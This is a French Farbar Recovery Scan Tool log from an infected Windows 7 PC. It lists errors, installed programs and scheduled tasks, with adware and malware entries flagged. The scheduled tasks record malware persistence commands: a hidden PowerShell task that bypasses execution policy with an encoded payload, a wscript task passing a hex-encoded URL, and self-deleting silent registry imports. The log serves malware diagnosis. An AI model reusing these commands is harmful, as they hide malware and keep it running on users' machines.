Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données.
Error: (12/09/2017 04:58:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT)
Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données.
Error: (12/09/2017 04:55:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante mbam.exe, version : 3.0.0.1284, horodatage : 0x5a15ab42
Nom du module défaillant : Qt5Core.dll, version : 5.6.2.0, horodatage : 0x59a63e00
Code d’exception : 0xc0000005
Décalage d’erreur : 0x001aa3b6
ID du processus défaillant : 0x1404
Heure de début de l’application défaillante : 0x01d371062cce062c
Chemin d’accès de l’application défaillante : C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
Chemin d’accès du module défaillant: C:\Program Files\Malwarebytes\Anti-Malware\Qt5Core.dll
ID de rapport : 6abb5332-dcf9-11e7-967a-402cf4cbb067
Error: (12/09/2017 04:55:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante mbam.exe, version : 3.0.0.1284, horodatage : 0x5a15ab42
Nom du module défaillant : Qt5Core.dll, version : 5.6.2.0, horodatage : 0x59a63e00
Code d’exception : 0xc0000005
Décalage d’erreur : 0x001aa3b6
ID du processus défaillant : 0x6b8
Heure de début de l’application défaillante : 0x01d3710629baab63
Chemin d’accès de l’application défaillante : C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
Chemin d’accès du module défaillant: C:\Program Files\Malwarebytes\Anti-Malware\Qt5Core.dll
ID de rapport : 67ee2930-dcf9-11e7-967a-402cf4cbb067
Error: (12/09/2017 04:54:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: AUTORITE NT)
Description: Le déchargement des chaînes de compteurs de performances pour le service WmiApRpl (WmiApRpl) a échoué. Le premier DWORD de la section Data contient le code d’erreur.
Error: (12/09/2017 04:54:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT)
Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données.
Error: (12/09/2017 04:54:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT)
Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données.
Error: (12/09/2017 04:53:28 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Échec de la création d’un point de restauration (Processus = C:\Windows\system32\DrvInst.exe "4" "0" "C:\Users\C-3PO\AppData\Local\Temp\{77abfab4-5fe9-39d2-0a82-1d1e434f3821}\seratousb.inf" "9" "655f5abc7" "00000000000004BC" "WinSta0\Default" "000000000000065C" "208" "c:\program files (x86)\serato\drivers\vista64\sl1" ; Description = Installation du package de pilotes : Cristalink Ltd Contrôleurs de bus USB ; Erreur = 0x80070422).
Erreurs système:
=============
Error: (12/09/2017 04:34:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service xy8EGwcCsXnF Updater n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
Error: (12/09/2017 04:34:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Windows Recover n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
Error: (12/09/2017 04:34:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Background Logic Handler n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
Error: (12/09/2017 04:33:10 PM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: Le service Windows Update ne s’est pas fermé correctement après avoir reçu une commande d’anticipation de fermeture.
Error: (12/09/2017 04:32:31 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Le serveur {51FA2736-5DEE-11D4-98E8-006008BF430C} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (12/09/2017 03:22:48 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Le dépassement de délai (60000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service 8c023e14d62cc32fcaee500b3f1fb4dd.
Error: (12/09/2017 03:21:48 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Le dépassement de délai (60000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service 8c023e14d62cc32fcaee500b3f1fb4dd.
Error: (12/09/2017 03:17:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service xy8EGwcCsXnF Updater n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
Error: (12/09/2017 03:17:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Windows Recover n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
Error: (12/09/2017 03:16:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Background Logic Handler n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
==================== Infos Mémoire ===========================
Processeur: Intel(R) Core(TM) i5-2450M CPU @ 2.50GHz
Pourcentage de mémoire utilisée: 78%
Mémoire physique - RAM - totale: 4030.36 MB
Mémoire physique - RAM - disponible: 854.8 MB
Mémoire virtuelle totale: 8058.89 MB
Mémoire virtuelle disponible: 2830.03 MB
==================== Lecteurs ================================
Drive c: () (Fixed) (Total:292.99 GB) (Free:230.21 GB) NTFS
Drive d: (HP_TOOLS) (Fixed) (Total:4.99 GB) (Free:4.99 GB) FAT32
==================== MBR & Table des partitions ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: E3FB0C75)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=293 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=5 GB) - (Type=0C)
==================== Fin de Addition.txt ============================
Exécuté par C-3PO (09-12-2017 18:04:24)
Exécuté depuis C:\Users\C-3PO\Downloads
Windows 7 Professional Service Pack 1 (X64) (2016-07-18 07:13:51)
Mode d'amorçage: Normal
==========================================================
==================== Comptes: =============================
Administrateur (S-1-5-21-1342067083-540354075-4242860494-500 - Administrator - Disabled)
C-3PO (S-1-5-21-1342067083-540354075-4242860494-1000 - Administrator - Enabled) => C:\Users\C-3PO
HomeGroupUser$ (S-1-5-21-1342067083-540354075-4242860494-1002 - Limited - Enabled)
Invité (S-1-5-21-1342067083-540354075-4242860494-501 - Limited - Disabled)
==================== Centre de sécurité ========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programmes installés ======================
(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)
Adblock Plus pour IE (32-bits et 64-bits) (HKLM\...\{40F6FB81-1B50-443B-A8E0-BC70E62CFB21}) (Version: 1.6 - Eyeo GmbH)
Adobe Acrobat Reader DC - Français (HKLM-x32\...\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}) (Version: 18.009.20050 - Adobe Systems Incorporated)
Alcor Micro Smart Card Reader Driver (HKLM-x32\...\{F24F876B-7D71-4BD6-88E9-614D3BB84216}) (Version: 1.7.16.0 - Alcor Micro Corp.) Hidden
Alcor Micro Smart Card Reader Driver (HKLM-x32\...\SZCCID) (Version: 1.7.16.0 - Alcor Micro Corp.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Broadcom 2070 Bluetooth 3.0 (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.6300 - Broadcom Corporation)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: 5.60.48.61 - Broadcom Corporation)
Broadcom Wireless Utility (HKLM\...\Broadcom Wireless Utility) (Version: 5.60.48.61 - Broadcom Corporation)
ByteFence Anti-Malware (HKLM-x32\...\ByteFence) (Version: 3.16.0.1 - Byte Technologies LLC) <==== ATTENTION
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
DragonBoost (HKU\S-1-5-21-1342067083-540354075-4242860494-1000\...\119) (Version: - ) <==== ATTENTION
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version: - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version: - Image-Line)
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden
HP 3D DriveGuard (HKLM\...\{7D75E270-0888-4331-96CC-B2A823B1C370}) (Version: 4.1.4.1 - Hewlett-Packard Company)
HP Connection Manager (HKLM-x32\...\{795AADBF-58C2-42D0-B779-E730702A247E}) (Version: 4.0.45.1 - Hewlett-Packard Company)
HP DayStarter (HKLM\...\{6876B842-0B24-405D-8A24-9DA0BC44A524}) (Version: 2.0.0.12 - Hewlett-Packard Company)
HP HotKey Support (HKLM\...\{8263B36C-A41E-4422-9031-1AE3641263AE}) (Version: 4.0.10.1 - Hewlett-Packard Company)
HP Power Assistant (HKLM\...\{DB41CA83-E024-4B66-9A8B-2787D2DAFE57}) (Version: 2.0.2.0 - Hewlett-Packard Company)
HP Webcam Driver (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.50058.0 - Sonix)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6325.0 - IDT)
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version: - Image-Line)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel(R) Network Connections Drivers (HKLM\...\PROSet) (Version: 15.4 - Intel)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2291 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.2.1004 - Intel Corporation)
JMicron 1394 Filter Driver (HKLM-x32\...\{13C96625-28E4-4c58-ADE0-CDAFC64752EB}) (Version: 1.00.20.00 - JMicron Technology Corp.)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.56.1 - JMicron Technology Corp.)
Joliebulle version 3.6 (HKLM-x32\...\{6192856F-8FBF-467C-A5E0-B5072405ED91}_is1) (Version: 3.6 - Pierre Tavares)
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Microsoft .NET Framework 4.7 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02053 - Microsoft Corporation)
Microsoft Office Famille et Petite Entreprise 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Module linguistique Microsoft Visual Studio 2010 Tools pour Office Runtime (x64) - FRA (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - FRA) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 57.0.2 (x64 fr) (HKLM\...\Mozilla Firefox 57.0.2 (x64 fr)) (Version: 57.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.2 - Mozilla)
Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.6.0 - Microleaves) Hidden <==== ATTENTION
Palikan (HKLM-x32\...\{2F7EC7BE-7FFE-163E-CE7E-66BE1EFEB53E}) (Version: - )
Scratch Live 2.5.0 (11) (HKLM-x32\...\{EA21EB55-073F-4CF5-A964-0412E755955A}) (Version: 2.5.0 - Serato Inc LP)
SDK (HKLM-x32\...\{0DEA342C-15CB-4F52-97B6-06A9C4B9C06F}) (Version: 2.24.025 - Portrait Displays, Inc.) Hidden
Search module (HKLM-x32\...\Search module) (Version: - Goobzo) <==== ATTENTION
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.18.25 - Synaptics Incorporated)
Validity Fingerprint Sensor Driver (HKLM\...\{FFC3E41D-2C2B-45B7-9AD9-5EA19572DD26}) (Version: 4.3.117.0 - Validity Sensors, Inc.)
VidsqaurE (HKLM-x32\...\{A97606DF-0FE1-4390-B0DD-ADA8B303AE61}_is1) (Version: 1.4 - ) <==== ATTENTION
WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
==================== Personnalisé CLSID (Avec liste blanche): ==========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2011-01-27] (Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {08494ACC-5AE0-4628-BF3B-D5F9E060FD48} - System32\Tasks\SoftUpgrade => C:\Program Files (x86)\SoftUpgrade\softup.exe [2017-08-23] () <==== ATTENTION
Task: {0E375635-E892-43C0-A703-72EB1BF35A57} - System32\Tasks\MJHiy315mf => C:\Program Files (x86)\rkD7DjTUbV\updengine.exe <==== ATTENTION
Task: {1296C4C9-A4CB-43A8-B212-A68F4B8C121A} - System32\Tasks\psv_Bamfind => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Strongdex.reg" & del "C:\ProgramData\Quoteex\Strongdex.reg" & SCHTASKS /Delete /TN "psv_Bamfind" /F <==== ATTENTION
Task: {152C23CD-2591-4D12-89C7-EF6C6BC05C9D} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2017-10-03] (Byte Technologies LLC) <==== ATTENTION
Task: {1C102085-031F-4A82-91AF-FC30D8E3C513} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {2A5E1462-37C2-4023-9803-17BCD4FAD9AE} - System32\Tasks\psv_Alphait => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Itdinity.reg" & del "C:\ProgramData\Quoteex\Itdinity.reg" & SCHTASKS /Delete /TN "psv_Alphait" /F <==== ATTENTION
Task: {325A18BC-BF0C-4230-A5BA-8693CA1D49FE} - System32\Tasks\PC Clean Plus => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: {3715CB8A-677A-43F0-8B4E-05F02A9B54B4} - System32\Tasks\Yahoo! Powered tesof => C:\Windows\system32\wscript.exe "C:\ProgramData\{F1CF34AC-7B8D-BE6A-FD4B-20286709ABE6}\fece.txt" "68747470733a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b46314346333441432d374238442d424536412d464434422d3230323836373039414245367d5c7361746f746f" "433a5c50726f6772616d446174615c7b46314346333441432d374238442d424536412d4644 (l'élément de données a 80 caractères en plus). <==== ATTENTION
Task: {4230B0FC-CC97-4BAB-B830-4C84D9DB25FC} - System32\Tasks\2f125f0fbe8a9d4d50ade39a0d76fa2c => powershell.exe -NoProfile -NoLogo -NonInteractive -ExecutionPolicy Bypass -File "C:\Windows\2f125f0fbe8a9d4d50ade39a0d76fa2c.ps1" <==== ATTENTION
Task: {5393FCD5-E1B1-4DE0-BD4C-924BBF57AA95} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {71E549D1-AF10-41E3-8CAD-56DAB31915F5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated)
Task: {7BDC94A4-05A6-4229-B3A4-195363A86CB0} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) <==== ATTENTION
Task: {7D8B1D88-BA3A-40B5-BA8A-DF8523628A7A} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {8D5A27DA-41A5-449C-9ED2-DCBFA593FEAA} - System32\Tasks\{4391CE22-1A7E-3EF0-0D52-5586C8F87E1C} => C:\PROGRA~2\COMMON~1\4391CE~1\SYNCVE~1.EXE
Task: {991E1A5E-AC00-4E60-928F-39B18A33A6F4} - System32\Tasks\psv_Tinlight => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Lighttough.reg" & del "C:\ProgramData\Quoteex\Lighttough.reg" & SCHTASKS /Delete /TN "psv_Tinlight" /F <==== ATTENTION
Task: {9D58D87A-560C-4979-B3C7-9F0B3E8AB0F4} - System32\Tasks\PC Clean Plus_UPDATES => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: {B4B9F2B3-C7A3-4E2C-B24D-25BEF8092D22} - System32\Tasks\8c023e14d62cc32fcaee500b3f1fb4dd => sc start 8c023e14d62cc32fcaee500b3f1fb4dd <==== ATTENTION
Task: {B64FEB13-6ECE-4C1B-BD8D-680FF76E41D0} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe <==== ATTENTION
Task: {B6E99B9D-A1E4-4903-AA9F-97AD036251C9} - System32\Tasks\psv_Domflex => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\S-fax.reg" & del "C:\ProgramData\Quoteex\S-fax.reg" & SCHTASKS /Delete /TN "psv_Domflex" /F <==== ATTENTION
Task: {C9BF127A-FD77-4573-A9DF-D14E151BC55E} - System32\Tasks\PnFXZuSqjm => C:\Program Files (x86)\jVddbi7Omy\updengine.exe <==== ATTENTION
Task: {DC7047A6-950B-4469-95E7-EE3C7C47FAAD} - System32\Tasks\h1vGT0e3jr => C:\Program Files (x86)\aC0MAzjNgZ\updengine.exe <==== ATTENTION
Task: {DD2713B0-2652-4EEA-AD34-18D8141DA007} - System32\Tasks\ADS DVD Burner => C:\Windows\system32\rundll32.exe "C:\Program Files\ADS DVD Burner\ADS DVD Burner.dll",vVkByOuobwZp <==== ATTENTION
Task: {E3B6C88C-0B1C-4DAE-B45C-640073AFF9FE} - System32\Tasks\EditRyIde => C:\Windows\system32\rundll32.exe "C:\Program Files\EditRyIde\EditRyIde.dll",IQTWaLBM <==== ATTENTION
Task: {E44163F4-8506-4B71-A750-814B62A9775F} - System32\Tasks\FastDataX Task => C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE
Task: {E7556430-47F3-4BB9-89D8-E435CC92D3CD} - System32\Tasks\Broadcom 1321F Wireless Mp525P => C:\Windows\system32\rundll32.exe "C:\Program Files\Broadcom 1321F Wireless Mp525P\Broadcom 1321F Wireless Mp525P.dll",RQsQpt <==== ATTENTION
Task: {EBA12B14-21E3-4B65-8FF4-814012A42B00} - System32\Tasks\SMW_UpdateTask_Time_323136313635353832372d3237575a236c6c3255342a41 => wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {ED14CDD1-F50A-433B-A00B-079CB77466FE} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
Task: {F36C961C-8D9E-4171-910F-477C1865591A} - System32\Tasks\xy8EGwcCsXnF => xy8egwccsxnf.exe
Task: {F57061BC-CFC7-4E68-A390-18678D54B00C} - System32\Tasks\PC Clean Plus_DEFAULT => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: {F89AB432-15F2-4002-B939-7A6A5F9CFD8C} - System32\Tasks\{0D0F0447-0D7E-790C-7811-79050B0C110C} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ADsAIAA7ACAAOwAgADsAOwA7ACAAIAA7ADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUA (l'élément de données a 10000 caractères en plus). <==== ATTENTION
Task: {F9537F5A-A4DC-4224-AB03-B1B2D4B6C331} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== ATTENTION
Task: {F9EE7113-FF80-4A9C-B60C-CAD83A043982} - System32\Tasks\SystemHealer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== ATTENTION
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\PC Clean Plus_DEFAULT.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\PC Clean Plus_UPDATES.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
Task: C:\Windows\Tasks\{4391CE22-1A7E-3EF0-0D52-5586C8F87E1C}.job => C:\PROGRA~2\COMMON~1\4391CE~1\SYNCVE~1.EXE
==================== Raccourcis & WMI ========================
(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)
Shortcut: C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Serato\Scratch LIVE\Install ASIO Drivers.lnk -> C:\Program Files (x86)\Serato\asio_installer.bat ()
ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d,
ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d,
ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d,
ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d,
==================== Modules chargés (Avec liste blanche) ==============
2017-09-16 12:58 - 2015-06-01 03:24 - 002144768 _____ () C:\Program Files\ADS DVD Burner\ADS DVD Burner.dll
2016-07-18 08:33 - 2011-01-27 03:11 - 000094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2010-07-29 18:39 - 2010-07-29 18:39 - 000173856 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btkeyind.dll
2011-01-26 17:14 - 2011-01-26 17:14 - 000036408 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\HPPA_Remote.dll
2017-12-09 14:44 - 2017-12-09 14:44 - 000304456 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
2017-12-09 14:44 - 2017-12-09 14:44 - 000619848 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
2011-01-26 17:13 - 2011-01-26 17:13 - 000080440 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\HardwareAccess.dll
2011-01-26 17:13 - 2011-01-26 17:13 - 000047160 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\Graphs.dll
2016-07-18 08:50 - 2011-01-26 16:34 - 001083392 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\System.Data.SQLite.dll
